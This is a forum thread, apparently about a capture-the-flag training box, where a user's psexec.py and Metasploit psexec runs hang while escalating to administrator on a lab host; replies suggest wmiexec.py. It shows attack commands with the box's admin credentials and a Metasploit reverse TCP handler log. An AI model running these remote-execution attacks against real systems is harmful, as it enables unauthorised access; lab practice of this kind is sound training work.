Starting Point (psexec.py)

When attempting privilege escalation I'm having issues with psexec.py hanging on the uploading file step. I've tried psexec and Metasploit as well as two different images of Kali and get the same on both. I've done quite a bit of searching and can't figure it out so any ideas are appreciated.

psexec:

[email protected]:~# psexec.py 'administrator:MEGACORP_4dm1n!!@10.10.10.27'

[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file KmgOXzkz.exe

Metasploit:

[*] Started reverse TCP handler on 10.10.14.49:4444
[*] 10.10.10.27:445 - Connecting to the server...
[*] 10.10.10.27:445 - Authenticating to 10.10.10.27:445 as user 'administrator'...
[*] 10.10.10.27:445 - Selecting PowerShell target
[*] 10.10.10.27:445 - Executing the payload...
[+] 10.10.10.27:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >

Comments

  • edited April 2020

    Double check your password. You have a typo.

    EDIT: Just kidding, your password is correct.

    TheBrick

  • Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

  • @johniesmithe said:

    Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

    Yeah, I've always had more success with wmiexec as well for some reason. Never looked into it, but interesting to see you come to the same conclusion.

  • @johniesmithe said:

    Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

    Thank god I stumbled across this, was about to start going balls deep into psexec.py
    Cheers

  • Tried wmiexec.py too... but no joy.

    Box broken?

  • edited April 24

    python3 psexec.py [email protected]
    Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

    Password:
    [-] [Errno Connection error (10.10.10.27:445)] timed out

    Why is this happening?

  • Someone helped me out; I'm stuck on python3 -m http.server 80
    => This is just showing the following:

    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)...
    Pls help me

  • @deepnest said:

    Someone helped me out; I'm stuck on python3 -m http.server 80
    => This is just showing the following:

    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)...
    Pls help me

    That's a server waiting for a connection. What do you want it to do?

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
